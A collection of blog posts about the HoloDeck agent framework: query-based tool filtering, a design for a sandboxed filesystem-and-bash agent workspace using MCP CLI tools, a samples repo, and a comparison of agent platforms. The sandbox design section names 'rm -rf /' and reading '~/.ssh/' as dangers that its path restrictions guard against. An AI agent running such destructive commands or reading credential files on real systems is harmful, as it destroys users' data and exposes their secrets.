    {"type": "function", "function": {"name": "brave_search-brave_web_search", ...}}
  ]
}

2 tools. 1,016 tokens.

That's an 83% reduction —from 5,888 tokens down to 1,016.

The logs tell the story:

Tool filtering: 2/16 tools selected for query: 'hi there...'
Selected tools: ['vectorstore-search_papers', 'brave_search-brave_web_search']

For a real research query like "Find papers on transformer architectures on the web", the filtering gets smarter:

Tool filtering: 3/16 tools selected
Selected tools: ['vectorstore-search_papers', 'brave_search-brave_web_search', 'memory-search_nodes']

The right tools. Automatically. Based on what the user actually asked.

Lessons Learned

1. MCP servers are tool factories. A single MCP server can expose dozens of functions. Without filtering, your token costs explode.

2. Tokenization matters for BM25. Make sure your tokenizer splits on underscores so brave_web_search becomes ["brave", "web", "search"]. Otherwise keyword matching fails on tool names.

3. Normalize your search scores. Raw BM25 scores range from 0-10+, and raw RRF scores are tiny (0.01-0.03). Both need normalization to 0-1 range, or your similarity_threshold won't work consistently. Semantic search (cosine similarity) is already 0-1.

4. After normalization, thresholds are consistent. With all methods normalized, good matches score 0.8-1.0 for BM25/hybrid, and 0.4-0.6 for semantic. A threshold of 0.5 works well across methods.

5. always_include is your safety net. Some tools are so core to your agent that you never want them filtered out. Make that explicit.

6. Be careful with always_include_top_n_used. This feature tracks usage and auto-includes frequently used tools. Sounds great, but early/accidental usage can bias future requests. Keep it at 0 during development.

What's Next

This is just tool filtering. Anthropic's post also covers:

Programmatic tool calling : Let the model write code to process intermediate results
Tool use examples : Providing concrete usage patterns to reduce parameter ambiguity

I might implement those next. But for now, getting 83% token reduction with a few hundred lines of code feels pretty good.

The full implementation is in HoloDeck's tool_filter module. PRs welcome.

Building a Filesystem + Bash Based Agentic Memory System (Part 1)

Jeremiah Justin Barias — Fri, 16 Jan 2026 00:00:00 +0000

Building a Filesystem + Bash Based Agentic Memory System (Part 1)

Part 1 of 3: Research, Patterns, and Design Goals

A few days ago, I wrote about how I reduced my agent's token consumption by 83% by implementing a ToolFilterManager that dynamically selects which tools to expose based on query relevance. That tackled the first major pattern from Anthropic's Advanced Tool Use article—the tool search tool.

But that article describes three patterns, and I've been eyeing the second one: programmatic tool calling.

The idea is to let Claude "orchestrate tools through code rather than through individual API round-trips." Instead of the model making 20 sequential tool calls (each requiring an inference pass), it writes a single code block that executes all of them, processing outputs in a sandboxed environment without inflating context. Anthropic reports a 37% token reduction on complex tasks with this approach.

This got me thinking: what if we took this further? What if instead of code execution, we gave agents direct filesystem and bash access?

Welcome to Part 1 of this rabbit hole.

What are we talking about?

Why Filesystem + Bash?
Existing Work
How It Works: Traditional vs Filesystem-Based
Bridging the Gap: MCP as CLI
Design Goals for My Experiment
What This Isn't
Next Up

Why Filesystem + Bash?

Vercel published a piece on building agents with filesystems and bash that crystallized something I'd been mulling over. Their core insight:

LLMs have been trained on massive amounts of code.

Models already know how to grep, cat, find, and ls. They've seen millions of examples of bash usage during training. You don't need to teach them your custom SearchCodebase tool—they already know grep -r "pricing objection" ./transcripts/.

Their results were compelling: a sales call summarization agent went from $1.00 to $0.25 per call on Claude Opus while improving output quality. That's not a typo—cheaper AND better.

The reason? Contextual precision. Vector search gives you semantic approximations. Prompt stuffing hits token limits. But grep -r returns exactly what you asked for, nothing more.

If you've used Claude Code, you've seen this pattern in action. The agent doesn't call abstract tools—it has a filesystem and runs commands against it. The model thinks in cat, head, tail, and jq, not ReadFile(path="/foo/bar").

Existing Work

I'm not the first person down this path.

AgentFS from Turso is a filesystem abstraction built on SQLite. Their pitch: "copy-on-write isolation, letting agents safely modify files while keeping your original data untouched." Everything lives in a single portable SQLite database—easy to snapshot, share, and audit. They've built CLI wrappers and SDKs for TypeScript, Python, and Rust. It's marked as ALPHA and explicitly not for production, but the architecture is interesting.

Claude Code is the obvious reference implementation. Anthropic gave their coding agent real filesystem access with sandboxing, and it works remarkably well. The agent naturally uses bash patterns it learned during training.

Vercel's bash-tool provides sandboxed bash execution alongside their AI SDK. Their examples show domain-to-filesystem mappings: customer support data organized by customer ID with tickets and conversations as nested files, sales transcripts alongside CRM records.

mcp-cli and mcptools enable calling MCP servers from the command line. This is the missing link—it lets agents invoke MCP tools via bash and redirect output to files, bridging the gap between structured tool definitions and filesystem-based execution.

How It Works: Traditional vs Filesystem-Based

Before diving deeper, let me illustrate the fundamental difference between these approaches.

Traditional Agentic Tool Calling

═══════════════════════════════════════════════════════════════════════
  TRADITIONAL TOOL CALLING
═══════════════════════════════════════════════════════════════════════

  User Query ──────▶ Agent (sends ALL 16 tool definitions)
                                      │
                                      ▼
                              ┌───────────────┐
                              │      LLM      │
                              │ "I'll use     │
                              │ search_docs & │
                              │ query_database│
                              │ tools"        │
                              └───────┬───────┘
                                      │
                                      ▼
                         Agent Executes Tools
                         search_docs("pricing")
                         query_database("customers")
                                      │
                                      ▼
                      ┌───────────────────────────────┐
                      │  RAW OUTPUT (1000s of tokens!)│
                      │  [full doc contents,          │
                      │   all 500 DB rows...]         │
                      └───────────────┬───────────────┘
                                      │
                                      ▼
                              ┌───────────────┐
                              │      LLM      │
                              │  (processes   │
                              │   ENTIRE      │
                              │   output)     │
                              └───────┬───────┘
                                      │
                                      ▼
                              ┌───────────────┐
                              │   Response    │
                              └───────────────┘

  Problems:
  ├── 🔴 All tool definitions sent every request (5,888 tokens just for schemas!)
  ├── 🔴 Full tool output dumped into context (DB query = 500 rows in context)
  └── 🔴 Each tool call = 1 inference round-trip

Filesystem + Bash Based Tool Calling

═══════════════════════════════════════════════════════════════════════
  FILESYSTEM + BASH TOOL CALLING
═══════════════════════════════════════════════════════════════════════

  User Query ──────▶ Agent (sends sandbox tool + fs structure)
                                      │
                                      ▼
                              ┌───────────────┐
                              │      LLM      │
                              │ "I'll explore │
                              │  the data:    │
                              │  ls, cat..."  │
                              └───────┬───────┘
                                      │
            ┌─────────────────────────┴─────────────────────────┐
            │                                                   │
            ▼                                                   │
  ┌───────────────────────┐                                     │
  │   Sandbox Execution   │                                     │
  │   $ ls ./customers/   │                                     │
  │   > acme/ globex/     │                                     │
  │     initech/ ...      │──────┐                              │
  └───────────────────────┘      │                              │
                                 │  (output written to file     │
                                 │   or returned as path)       │
                                 ▼                              │
                  ┌────────────────────────────┐                │
                  │           LLM              │                │
                  │  "Found customers. Now:    │                │
                  │   grep -r 'pricing' ./docs │                │
                  │   | head -20"              │                │
                  └─────────────┬──────────────┘                │
                                │                               │
                                ▼                               │
                  ┌───────────────────────┐                     │
                  │   Sandbox Execution   │                     │
                  │   $ grep -r 'pricing' │                     │
                  │     ./docs | head -20 │                     │
                  └─────────────┬─────────┘                     │
                                │                               │
                                ▼                               │
                  ┌────────────────────────────┐                │
                  │           LLM              │                │
                  │  "Need more detail on      │                │
                  │   enterprise tier:         │                │
                  │   awk '/enterprise/,/---/' │◀───────────────┘
                  │     ./docs/pricing.md"     │     (loop until
                  └─────────────┬──────────────┘      sufficient
                                │                     context)
                                ▼
                        ┌──────────────┐
                        │   Response   │
                        │  (with only  │
                        │   relevant   │
                        │   context)   │
                        └──────────────┘

  Benefits:
  ├── 🟢 Minimal tool definitions (just "sandbox" tool)
  ├── 🟢 Agent controls what enters context (grep, head, awk filter results)
  ├── 🟢 LLM already knows bash (trained on millions of examples)
  └── 🟢 Composable commands (pipes, redirects, filters)

The Key Insight

The traditional approach treats the LLM as a passive consumer—it requests data and gets everything back. The filesystem approach treats the LLM as an active explorer—it navigates, filters, and retrieves only what it needs.

Traditional:    "Give me all the data, I'll figure it out"
                 └── Context explodes, tokens burn 🔥

Filesystem:     "Let me look around and grab what I need"
                 └── Context stays lean, costs drop 📉

Bridging the Gap: MCP as CLI

The diagrams above assume files already exist in the sandbox. But where do they come from?

This is where MCP CLI tools bridge the gap. Instead of MCP servers returning results directly into the LLM's context, they can be invoked as bash commands that write output to files.

MCP as CLI Commands

Several tools enable calling MCP servers from the command line:

mcp-cli by Phil Schmid uses a clean syntax:

# List available servers and tools
mcp-cli

# Inspect a tool's schema
mcp-cli filesystem/read_file

# Execute a tool
mcp-cli filesystem/read_file '{"path": "./README.md"}'

mcptools offers similar functionality:

mcp call read_file --params '{"path":"README.md"}' npx -y @modelcontextprotocol/server-filesystem ~

The Integration Pattern

Here's how traditional tools integrate with the filesystem approach:

═══════════════════════════════════════════════════════════════════════
  DATA INGESTION: MCP → SANDBOX FILESYSTEM
═══════════════════════════════════════════════════════════════════════

  ┌─ LLM decides it needs customer data ───────────────────────────────
  │
  │  "I need to query the database for enterprise customers.
  │   Let me fetch that data into my workspace."
  │
  └────────────────────────────┬───────────────────────────────────────
                               │
                               ▼
  ┌─ SANDBOX EXECUTION ────────────────────────────────────────────────
  │
  │  $ mcp-cli database/query_customers '{"tier": "enterprise"}' \
  │      > ./sandbox/data/customers.json
  │
  │  $ mcp-cli vectorstore/search '{"query": "pricing policy"}' \
  │      > ./sandbox/docs/pricing_results.json
  │
  │  $ mcp-cli brave-search/web_search '{"query": "competitor pricing"}' \
  │      > ./sandbox/research/competitors.json
  │
  └────────────────────────────┬───────────────────────────────────────
                               │
                               │  (data now exists as files)
                               ▼
  ┌─ SANDBOX FILESYSTEM STATE ─────────────────────────────────────────
  │
  │  ./sandbox/
  │  ├── data/
  │  │   └── customers.json          # 500 customer records
  │  ├── docs/
  │  │   └── pricing_results.json    # vectorstore search results
  │  └── research/
  │      └── competitors.json        # web search results
  │
  └────────────────────────────┬───────────────────────────────────────
                               │
                               ▼
  ┌─ LLM explores with bash (only pulls what it needs into context) ───
  │
  │  $ jq '.customers | length' ./sandbox/data/customers.json
  │  > 500
  │
  │  $ jq '.customers[] | select(.revenue > 1000000) | .name' \
  │      ./sandbox/data/customers.json | head -10
  │  > "Acme Corp"
  │  > "Globex Inc"
  │  > ...
  │
  │  $ grep -l "enterprise" ./sandbox/docs/*.json
  │  > ./sandbox/docs/pricing_results.json
  │
  └────────────────────────────────────────────────────────────────────

Why This Matters

The traditional approach would send all 500 customer records directly into context. With filesystem-based execution:

MCP call writes to file → Data exists but isn't in context yet
Agent uses jq to count → Only "500" enters context (3 tokens)
Agent filters with jq → Only 10 company names enter context (~30 tokens)
Agent got what it needed → Instead of 500 records (~50,000 tokens)

Phil Schmid's research on mcp-cli showed this pattern reduces tool-related token consumption from ~47,000 tokens to ~400 tokens—a 99% reduction—because agents discover and use tools just-in-time rather than loading all definitions upfront.

The Complete Flow

═══════════════════════════════════════════════════════════════════════
  COMPLETE FILESYSTEM + MCP FLOW
═══════════════════════════════════════════════════════════════════════

  User Query: "Which enterprise customers mentioned pricing concerns?"
                               │
                               ▼
  ┌─ STEP 1: Fetch data via MCP CLI ───────────────────────────────────
  │
  │ $ mcp-cli database/query_customers '{"tier":"enterprise"}' \
  │     > ./data/customers.json
  │
  │ $ mcp-cli crm/get_conversations '{"customer_ids":"$CUSTOMER_IDS"}' \
  │     > ./data/conversations.json
  │
  └────────────────────────────┬───────────────────────────────────────
                               │
                               ▼
  ┌─ STEP 2: Explore with bash ────────────────────────────────────────
  │
  │ $ jq -r '.[] | .id' ./data/customers.json | wc -l
  │ > 47
  │
  │ $ grep -l "pricing" ./data/conversations.json
  │ > (matches found)
  │
  │ $ jq '.[] | select(.text | contains("pricing")) | {customer, text}' \
  │     ./data/conversations.json > ./analysis/pricing_mentions.json
  │
  └────────────────────────────┬───────────────────────────────────────
                               │
                               ▼
  ┌─ STEP 3: Extract only relevant context ────────────────────────────
  │
  │ $ cat ./analysis/pricing_mentions.json | head -50
  │ > [{"customer": "Acme", "text": "pricing seems high..."},
  │ >  {"customer": "Globex", "text": "need better pricing..."}]
  │
  └────────────────────────────┬───────────────────────────────────────
                               │
                               ▼
                        ┌──────────────┐
                        │   Response   │
                        │  (informed   │
                        │   by ~50     │
                        │   relevant   │
                        │   lines)     │
                        └──────────────┘

  Token savings:
  ├── Without filesystem: 47 customers × 20 conversations × ~500 tokens = 470,000 tokens
  └── With filesystem: ~200 tokens (just the relevant pricing mentions)

Design Goals for My Experiment

I want to build something that integrates with Holodeck, which uses Semantic Kernel for agent orchestration. Here's what I'm aiming for:

1. Filesystem Security

Letting LLMs run bash commands on your actual filesystem is... not great. The horror stories write themselves.

My approach:

Copy-on-write isolation. Like AgentFS, the agent operates in a sandboxed directory. Writes don't touch original files until explicitly committed.
Audit logging. Every file operation gets logged. Every. Single. One. AgentFS makes this queryable, and I want the same—know what the agent did, when, and be able to roll it back.
Path restrictions. The agent only sees paths within its sandbox. No rm -rf / accidents, no reading ~/.ssh/.

This is non-negotiable for anything beyond toy experiments.

2. Token and Context Reduction

This is where the programmatic tool calling pattern really shines.

In traditional tool calling:

Model requests tool call
Tool executes
Entire output goes back into context
Model processes output
Repeat

Query a database with 1000 rows? That's 1000 rows in your context window. Every. Single. Time.

The filesystem pattern flips this:

Command outputs get written to files
To access results, the agent runs CLI commands: head -20 results.json, jq '.users[] | .name' data.json, grep -c "error" logs.txt
The agent pulls in only what it needs, when it needs it, in the format it needs it

This is how Claude Code handles large codebases without blowing through context limits. It's also why Vercel saw their costs drop 75%.

3. Integration with Semantic Kernel Tool Calling

Here's where I want to experiment. Holodeck already has tool definitions—vectorstore searches, MCP servers, custom functions. What if these could execute in "filesystem mode"?

Imagine a search_knowledge_base tool that, instead of returning results directly:

Runs as a subprocess
Writes results to ./sandbox/outputs/search_001.json
Returns just the path to the agent
Lets the agent cat or jq the file as needed

You get structured tool definitions for discoverability (the model knows what tools exist), but filesystem semantics for execution (the model controls what data actually enters context).

This could layer nicely with the tool search pattern I already built. Filter tools dynamically, then execute them in a sandboxed filesystem. Best of both worlds.

What might this look like in practice? Today, Holodeck tools are defined like this:

tools:
  - name: knowledge_search
    type: vectorstore
    config:
      index: product-docs

  - name: brave_search
    type: mcp
    server: brave-search

What if we added an execution mode?

tools:
  - name: knowledge_search
    type: vectorstore
    config:
      index: product-docs
    execution:
      mode: filesystem              # NEW: execute via CLI, write to file
      output_dir: ./sandbox/search

  - name: brave_search
    type: mcp
    server: brave-search
    execution:
      mode: filesystem
      output_dir: ./sandbox/web

The agent would then call these as CLI commands:

$ holodeck-tool knowledge_search '{"query": "pricing"}' > ./sandbox/search/001.json
$ holodeck-tool brave_search '{"query": "competitor analysis"}' > ./sandbox/web/001.json

Same tool definitions for discoverability. Filesystem semantics for execution. The agent still knows what tools exist (via the tool search pattern from my previous post), but now it controls when and how much of the output enters context.

4. Multi-Platform Support

I'm on macOS. Most servers run Linux. Some people poor souls use Windows.

The goal is cross-platform support, which means:

No macOS-specific sandboxing (sorry, sandbox-exec)
Abstracting filesystem operations through a clean interface
Probably leaning on Docker for production isolation

This is the stretch goal. I'll be happy if macOS and Linux work cleanly.

What This Isn't

To be clear: this is an experiment. I'm not replacing Holodeck's core execution model with bash. The standard tool calling flow works great for most use cases, and the tool search pattern I built already handles the "too many tools" problem.

What I'm building is an additional capability—a sandbox tool that agents can use when they need filesystem-style access for memory-intensive or retrieval-heavy tasks. Think of it as giving your agent a scratchpad with Unix superpowers.

The eventual API might look something like:

tools:
  - name: sandbox
    type: sandbox
    config:
      base_path: ./workspace
      allowed_commands: [cat, grep, ls, head, tail, find, jq, awk]
      audit_log: ./logs/sandbox.log
      copy_on_write: true

But that's getting ahead of myself. Implementation is for Part 2.

Next Up

In Part 2, I'll dig into implementation details:

Setting up the sandboxed filesystem
Copy-on-write semantics (probably borrowing ideas from AgentFS)
The command execution layer with proper escaping and timeouts
Audit logging and rollback

Part 3 will cover Semantic Kernel integration—making existing tools execute in "filesystem mode" and exposing the whole thing as a Holodeck tool.

If you've built something similar or have thoughts on the approach, I'd love to hear about it.

This post is part of a series on building filesystem-based agentic memory systems. Read my previous post on reducing token consumption with tool search for context on the first pattern I implemented.

[Boost]

Jeremiah Justin Barias — Fri, 09 Jan 2026 22:27:13 +0000

HoloDeck Part 1: Why Building AI Agents Feels So Broken

Jeremiah Justin Barias ・ Dec 6 '25

#ai #agents #evals

Holodeck samples

Jeremiah Justin Barias — Fri, 09 Jan 2026 22:23:43 +0000

If you want to get moving fast with HoloDeck, this samples repo is the quickest on-ramp. It's a set of ready-to-run examples you can run, poke around in, and fork as templates:

https://github.com/justinbarias/holodeck-samples

Configuring Prerequisites
Explore the use cases
Coding assistant integration (Claude Code, GitHub Copilot)

Configuring Prerequisites

You'll need a handful of things installed to run the samples locally:

Clone the repo
Install HoloDeck CLI
Grab the supporting tools
Fire up the shared infrastructure
Pick a sample + provider
Fire up the agent and frontend

Explore the use cases

Here are the four use cases, each with OpenAI, Azure OpenAI, and Ollama flavors:

Ticket Routing (ticket-routing/) - Routes support tickets with structured outputs and confidence scores.
Customer Support (customer-support/) - RAG-powered chatbot with memory and escalation.
Content Moderation (content-moderation/) - Multi-category moderation with policy enforcement and consistency checks.
Legal Summarization (legal-summarization/) - Clause extraction, risk flags, and summary quality metrics.

Each sample sticks to the same layout, so you can find stuff fast:

<use-case>/<provider>/
├── agent.yaml
├── config.yaml
├── .env.example
├── instructions/
├── data/
└── copilotkit/

Coding assistant integration (Claude Code, GitHub Copilot)

The repo also comes with built-in prompts for both Claude Code and GitHub Copilot to speed up agent authoring and tuning.

Claude Code

Slash commands live in .claude/commands/
/holodeck.create - Guided wizard for creating a new agent
/holodeck.tune path/to/agent.yaml - Tuning helper that boosts test performance

GitHub Copilot

Prompt files live in .github/prompts/
holodeck-create and holodeck-tune provide the same workflows as guided prompts
In VS Code, type / or #prompt: in Copilot Chat to launch them

Both tools are great for small, reviewable tweaks. Keep secrets out of prompts, and sanity-check changes by running the sample after edits.

Star, clone, fork, or use however you like! If you run into issues, file them here.

HoloDeck Part 2: What's Out There for AI Agents

Jeremiah Justin Barias — Fri, 15 Nov 2024 00:00:00 +0000

In Part 1, I talked about why agent development feels broken. Before building something myself, I spent time looking at what's already out there. Here's what I found.

This is Part 2 of a 3-Part Series

Why It Feels Broken - What's wrong with agent development
What's Out There (You are here)
What I'm Building - HoloDeck's approach and how it works

The Landscape

A bunch of platforms tackle parts of this problem. I wanted something open-source, self-hosted, and config-driven—something that fits into existing CI/CD workflows without vendor lock-in. That shaped how I evaluated these tools.

Developer Tools & Frameworks

LangSmith (LangChain Team)

LangSmith is really good at what it does—production observability and tracing for LangChain apps. If you're already in the LangChain ecosystem and need monitoring, it's solid.

Aspect	What i want	LangSmith
Deployment Model	Self-hosted (open-source)	SaaS only
CI/CD Integration	CLI-based, works in any pipeline	API-based, needs cloud connectivity
Agent Definition	Pure YAML	Python code + LangChain SDK
Primary Focus	Agent experimentation & deployment	Production observability & tracing
Agent Orchestration	Multi-agent patterns	Not designed for multi-agent workflows
Agent Evaluation	Custom criteria, LLM-as-judge, NLP metrics (BLEU, METEOR, ROUGE, F1)	LLM-as-judge, custom evaluators
Self-Hosted LLMs	Native support (Ollama, vLLM, OpenAI-compatible)	Via LangChain integrations

Different tools for different problems. LangSmith is about monitoring production apps; I was looking for something to help with the build-and-test loop.

MLflow GenAI (Databricks)

MLflow is a beast for ML experiment tracking. Their GenAI additions are interesting, but it's designed for model comparison rather than agent workflows. If you're already using MLflow for ML ops, the GenAI features slot in nicely.

Aspect	What i want	MLflow GenAI
CI/CD Integration	CLI-native	Python SDK + REST API
Infrastructure	Lightweight, portable	Heavy (ML tracking server, often Databricks)
Agent Support	Purpose-built for agents	Focused on model evaluation
Multi-Agent	Native orchestration patterns	Single model/variant comparison
Complexity	Minimal (YAML)	Higher (ML engineering mindset)
Agent Evaluation	Custom criteria, LLM-as-judge, NLP metrics	LLM-as-judge, custom scorers

The infrastructure overhead was the main thing that put me off. I wanted something lighter.

Microsoft PromptFlow

PromptFlow has a nice visual approach—you can see your flows as graphs, which is great for understanding what's happening. But it's really about individual functions and tools, not full agent orchestration.

Aspect	What i want	PromptFlow
CI/CD Integration	CLI-first	Python SDK, Azure-centric
Scope	Full agent lifecycle	Individual tools & functions
Design Target	Multi-agent workflows	Single tool/AI function development
Configuration	Pure YAML	Visual flow graphs + low-code Python
Agent Orchestration	Multi-agent patterns	Not designed for multi-agent
Self-Hosted	Yes	Limited (designed for Azure)
Agent Evaluation	Custom criteria, LLM-as-judge, NLP metrics	LLM-as-judge (GPT-based), F1/BLEU/ROUGE

If you're building individual AI functions and live in Azure, PromptFlow makes sense. For agent-level work, it's not quite there.

The Cloud Providers

All three major clouds have agent platforms now. They're impressive, but they come with the obvious trade-off: you're locked into their ecosystem.

Azure AI Foundry (Microsoft)

Azure AI Foundry is Microsoft's enterprise play. It integrates with the whole Microsoft stack—Teams, Copilot, etc. If you're already a Microsoft shop, there's a lot to like.

Aspect	What i want	Azure AI Foundry
Deployment Model	Self-hosted (open-source)	SaaS (Azure-dependent)
CI/CD Integration	CLI, works anywhere	Azure DevOps/GitHub Actions
Agent Definition	Pure YAML	YAML Workflows and Prompt agents
Primary Focus	Experimentation & deployment	Enterprise agent orchestration
Agent Orchestration	Multi-agent patterns	Multi-agent via Agents Framework or Workflows
Self-Hosted	Yes	No (Azure required)
Agent Evaluation	Custom criteria, LLM-as-judge, NLP	LLM-as-judge, NLP metrics

The workflows and prompt-based agents are interesting, but still hard locked into the Foundry offering.

Amazon Bedrock AgentCore (AWS)

Bedrock AgentCore is AWS's managed agent service. Good for running agents at scale if you're already on AWS and using their model offerings.

Aspect	What i want	Amazon Bedrock AgentCore
Deployment Model	Self-hosted (open-source)	SaaS (AWS-managed)
CI/CD Integration	CLI, works anywhere	AWS CodePipeline?/API-based
Agent Definition	Pure YAML	Code (SDK + LangGraph, CrewAI, etc.)
Primary Focus	Experimentation & deployment	Enterprise agent operations at scale
Agent Orchestration	Multi-agent patterns	Multi-agent collaboration (supervisor modes)
Self-Hosted	Yes	No (AWS required)
Agent Evaluation	Custom criteria, LLM-as-judge, NLP	LLM-as-judge, custom metrics, RAG eval
Self-Hosted LLMs	Native support (Ollama, vLLM)	Bedrock models only

If you want to use local models or run outside AWS, this isn't really an option.

Vertex AI Agent Engine (Google Cloud)

Google's entry into the agent space. The A2A protocol for multi-agent communication is interesting. Like the others, you're tied to GCP.

Aspect	What i want	Vertex AI Agent Engine
Deployment Model	Self-hosted (open-source)	SaaS (GCP-managed)
CI/CD Integration	CLI, works anywhere	Cloud Build/GitHub Actions
Agent Definition	Pure YAML	Code (ADK, LangChain, LangGraph)
Primary Focus	Experimentation & deployment	Production agent runtime
Agent Orchestration	Multi-agent patterns	Multi-agent via A2A protocol
Self-Hosted	Yes	No (GCP required)
Agent Evaluation	Custom criteria, LLM-as-judge, NLP	LLM-as-judge (Gemini), ROUGE/BLEU
Self-Hosted LLMs	Native support (Ollama, vLLM)	vLLM in Model Garden (complex setup)

Similar story—great if you're committed to GCP, but not portable.

What's Missing

After looking at all of these, here's what I couldn't find:

Self-hosted and cloud-agnostic - Everything is either SaaS or tied to a specific cloud
Declarative agent definition - Most require SDK code, not just config
Vendor-neutral CI/CD - The integrations assume you're using their ecosystem
Testing + evaluation + deployment in one place - Usually you're stitching together multiple tools

This is the gap I'm trying to fill with HoloDeck. Not saying it's better than these tools—they're solving different problems. But if you care about portability and owning your workflow, there wasn't much out there.

Quick Reference

If you need...	Look at...
Production observability for LangChain	LangSmith
ML experiment tracking at scale	MLflow
Visual prompt flow design on Azure	PromptFlow
Enterprise agents in Microsoft ecosystem	Azure AI Foundry
Managed agents on AWS	Bedrock AgentCore
Production runtime on GCP	Vertex AI Agent Engine
Self-hosted, config-driven, CI/CD-native	HoloDeck

Next Up

In Part 3, I'll walk through how HoloDeck works—the design decisions, the YAML config approach, the SDK, and what's actually built vs. what's still on the roadmap.

Continue to Part 3 →

DEV Community: Jeremiah Justin Barias

Your Eval Suite Is Already a Loss Function

Table of Contents

The loop everyone runs by hand

The eval suite was a loss function the whole time

Two problems: no gradient, and mixed axes

Coordinate descent, with an LLM for the text

How it fits into holodeck

Acceptance, and the part I haven't solved yet

What you get out the other end

Where this goes next

References

Agent Workflows: A Solved Problem, Reinvented

What graph dataflow actually is

Where the frontier labs sit

The actual spectrum of orchestration

The cost of a new paradigm

What models can do for themselves now

We've forgotten about bounded contexts

So what should you reach for?

References

I Built an OpenTelemetry Instrumentor for Claude Agent SDK

Table of Contents

Background

The problem

What I built

The hooks thing

Getting started

What the traces look like

Rough edges and what's next

You Don't Need Any Other Agent Framework, You Only Need Claude Agents SDK

Table of Contents

Why Claude Agents SDK

How HoloDeck Runs Claude Under the Hood

The Bridges and Adapters I Built

Tool Adapters (tool_adapters.py)

MCP Bridge (mcp_bridge.py)

OTel Bridge (otel_bridge.py)

Custom Tools Are Just MCP Servers

What's Supported Today

Core Features

Claude-Specific Capabilities

Security: Sandboxing and Secure Deployment

The Threat Model

Built-in Sandboxing

Configuring the Sandbox Programmatically

Production Hardening

What HoloDeck Does Today

Using Claude Agents SDK Without an Anthropic API Key

Auth: Local Experimentation vs Production

What's Coming Next

Hooks

Agent Skills

Subagents (Multi-Agent Swarms)

holodeck serve for Claude Agents

holodeck deploy with Claude

Human-in-the-Loop Approvals

Custom Anthropic Endpoints

Wrapping Up

Take Back the Stack. Your Cloud Provider Doesn't Want You To.

Take Back the Stack. Your Cloud Provider Doesn't Want You To.

How We Got Here

The Agent Platform Gold Rush (And Why You Should Be Suspicious)

Something Changed and Most People Missed It

You Don't Need a 10x Team. You Might Need Three People.

Stop Letting IT Gatekeep Developer Platforms

Build the Moat Around What Actually Matters

The Risk of Waiting

RAG Is Dead. Long Live RAG. Or Is It?

What we're covering

The Great Vector Gold Rush

GraphRAG and the Hype That Fizzled

The Blog Post That Changed Everything (For Me)

The Pipeline

The Numbers

From Insight to Implementation: The Hierarchical Document Tool

Structure-aware chunking

Contextual embeddings via LLM

Hybrid search with tiered keyword strategy

Reranking: the final 18% that matters

Tool Adapters (`tool_adapters.py`)

MCP Bridge (`mcp_bridge.py`)

OTel Bridge (`otel_bridge.py`)

`holodeck serve` for Claude Agents

`holodeck deploy` with Claude